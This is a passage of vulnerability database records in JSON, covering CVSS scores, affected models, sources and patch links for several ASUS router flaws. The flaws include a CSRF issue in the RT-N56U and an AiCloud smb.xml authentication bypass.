"vendor": "asustek computer",
"version": null
},
{
"model": "rt-n53",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-n56u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007119"
},
{
"db": "NVD",
"id": "CVE-2013-3093"
}
]
},
"cve": "CVE-2013-3093",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CVE-2013-3093",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2013-3093",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2013-3093",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-3093",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2013-3093",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202001-1276",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007119"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1276"
},
{
"db": "NVD",
"id": "CVE-2013-3093"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS RT-N56U devices allow CSRF. ASUS RT-N56U The device contains a cross-site request forgery vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-3093"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007119"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-3093",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007119",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1276",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007119"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1276"
},
{
"db": "NVD",
"id": "CVE-2013-3093"
}
]
},
"id": "VAR-202001-0883",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.5950836471428572
},
"last_update_date": "2024-08-14T14:45:05.083000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.asus.com/us/"
},
{
"title": "ASUS RT-N56U Fixes for cross-site request forgery vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=107622"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007119"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1276"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.0
},
{
"problemtype": "Cross-site request forgery (CWE-352) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007119"
},
{
"db": "NVD",
"id": "CVE-2013-3093"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.securityfocus.com/archive/1/531194"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-3093"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007119"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1276"
},
{
"db": "NVD",
"id": "CVE-2013-3093"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007119"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1276"
},
{
"db": "NVD",
"id": "CVE-2013-3093"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007119"
},
{
"date": "2020-01-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-1276"
},
{
"date": "2020-01-28T21:15:11.560000",
"db": "NVD",
"id": "CVE-2013-3093"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007119"
},
{
"date": "2020-05-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-1276"
},
{
"date": "2020-01-31T16:06:35.230000",
"db": "NVD",
"id": "CVE-2013-3093"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS\u00a0RT-N56U\u00a0 Cross-site request forgery vulnerability in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007119"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-1276"
}
],
"trust": 0.6
}
}
VAR-201401-0754
Vulnerability from variot - Updated: 2022-05-17 02:09Multiple ASUS RT routers are prone to an unspecified security bypass vulnerability. Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions on the affected application. This may aid in further attacks. ASUS RT-AC68U, RT-AC56U, RT-AC66U, RT-N66U, RT-N16 are vulnerable.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201401-0754",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-n66u",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-ac68u",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-ac56u",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "65558"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Kyle Lovett",
"sources": [
{
"db": "BID",
"id": "65558"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple ASUS RT routers are prone to an unspecified security bypass vulnerability.\nAttackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions on the affected application. This may aid in further attacks.\nASUS RT-AC68U, RT-AC56U, RT-AC66U, RT-N66U, RT-N16 are vulnerable.",
"sources": [
{
"db": "BID",
"id": "65558"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "65558",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "65558"
}
]
},
"id": "VAR-201401-0754",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.539766506
},
"last_update_date": "2022-05-17T02:09:50.265000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "https://www.asus.com/networking/rtac68u/#support"
},
{
"trust": 0.3,
"url": "https://www.asus.com/"
}
],
"sources": [
{
"db": "BID",
"id": "65558"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "65558"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-06T00:00:00",
"db": "BID",
"id": "65558"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-06T00:00:00",
"db": "BID",
"id": "65558"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "65558"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple ASUS RT Routers Remote Security Bypass Vulnerability",
"sources": [
{
"db": "BID",
"id": "65558"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "65558"
}
],
"trust": 0.3
}
}
VAR-201403-0712
Vulnerability from variot - Updated: 2022-05-17 01:51ASUS (ASUS) is the largest hardware manufacturer in Taiwan. A variety of ASUS router products (firmware version 3.0.0.4.374.x) failed to properly restrict access to the file /smb.xml after enabling the AiCloud web service, and an attacker could exploit the vulnerability to leak sensitive information. Multiple ASUS Routers are prone to an authentication-bypass vulnerability. An attacker could leverage this issue to bypass the authentication mechanism and obtain sensitive information. The following products running firmware version 3.0.0.4.374.x are vulnerable: RT-AC68U Dual-band Wireless-AC1900 Gigabit Router RT-AC66R Dual-Band Wireless-AC1750 Gigabit Router RT-AC66U Dual-Band Wireless-AC1750 Gigabit Router RT-N66R Dual-Band Wireless-N900 Gigabit Router RT-N66U Dual-Band Wireless-N900 Gigabit Router RT-AC56U Dual-Band Wireless-AC1200 Gigabit Router RT-N56R Dual-Band Wireless-AC1200 Gigabit Router RT-N56U Dual-Band Wireless-AC1200 Gigabit Router RT-N14U Wireless-N300 Cloud Router RT-N14UHP Wireless-N300 Cloud Router RT-N16 Wireless-N300 Gigabit Router RT-N16R Wireless-N300 Gigabit Router
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201403-0712",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-ac56u router",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n14u router",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n16 router",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n56r router",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n66r router",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac66r router",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac68u router",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n14uhp router",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n16r router",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n56u wireless router",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n66u router",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac66u router",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n66u",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-n66r",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-n56r",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-n16r",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-n14uhp",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-n14u",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-ac68u",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-ac66r",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-ac56u",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01390"
},
{
"db": "BID",
"id": "65861"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "kyle Lovett",
"sources": [
{
"db": "BID",
"id": "65861"
}
],
"trust": 0.3
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-01390",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2014-01390",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01390"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS (ASUS) is the largest hardware manufacturer in Taiwan. A variety of ASUS router products (firmware version 3.0.0.4.374.x) failed to properly restrict access to the file /smb.xml after enabling the AiCloud web service, and an attacker could exploit the vulnerability to leak sensitive information. Multiple ASUS Routers are prone to an authentication-bypass vulnerability. \nAn attacker could leverage this issue to bypass the authentication mechanism and obtain sensitive information. \nThe following products running firmware version 3.0.0.4.374.x are vulnerable:\nRT-AC68U Dual-band Wireless-AC1900 Gigabit Router\nRT-AC66R Dual-Band Wireless-AC1750 Gigabit Router\nRT-AC66U Dual-Band Wireless-AC1750 Gigabit Router\nRT-N66R Dual-Band Wireless-N900 Gigabit Router\nRT-N66U Dual-Band Wireless-N900 Gigabit Router\nRT-AC56U Dual-Band Wireless-AC1200 Gigabit Router\nRT-N56R Dual-Band Wireless-AC1200 Gigabit Router\nRT-N56U Dual-Band Wireless-AC1200 Gigabit Router\nRT-N14U Wireless-N300 Cloud Router\nRT-N14UHP Wireless-N300 Cloud Router\nRT-N16 Wireless-N300 Gigabit Router\nRT-N16R Wireless-N300 Gigabit Router",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01390"
},
{
"db": "BID",
"id": "65861"
}
],
"trust": 0.81
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "65861",
"trust": 0.9
},
{
"db": "SECUNIA",
"id": "56905",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2014-01390",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01390"
},
{
"db": "BID",
"id": "65861"
}
]
},
"id": "VAR-201403-0712",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01390"
}
],
"trust": 1.411373705909091
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01390"
}
]
},
"last_update_date": "2022-05-17T01:51:10.409000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for multiple ASUS routers \u0027smb.xml\u0027 authentication bypass vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/43991"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01390"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://secunia.com/advisories/56905/"
},
{
"trust": 0.3,
"url": "http://archives.neohapsis.com/archives/bugtraq/2014-02/0032.html"
},
{
"trust": 0.3,
"url": "http://www.asus.com"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01390"
},
{
"db": "BID",
"id": "65861"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-01390"
},
{
"db": "BID",
"id": "65861"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01390"
},
{
"date": "2014-02-08T00:00:00",
"db": "BID",
"id": "65861"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01390"
},
{
"date": "2014-02-08T00:00:00",
"db": "BID",
"id": "65861"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "65861"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple ASUS Router \u0027smb.xml\u0027 Authentication Bypass Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01390"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "65861"
}
],
"trust": 0.3
}
}
CVE-2013-4937 (GCVE-0-2013-4937)
Vulnerability from nvd – Published: 2013-07-26 10:00 – Updated: 2024-09-17 02:46
VLAI?
Summary
Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T16:59:40.986Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://reviews.cnet.com/8301-3132_7-57594003-98"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://twitter.com/ASUSUSA/statuses/357612236392509440"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-07-26T10:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://reviews.cnet.com/8301-3132_7-57594003-98"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://twitter.com/ASUSUSA/statuses/357612236392509440"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-4937",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
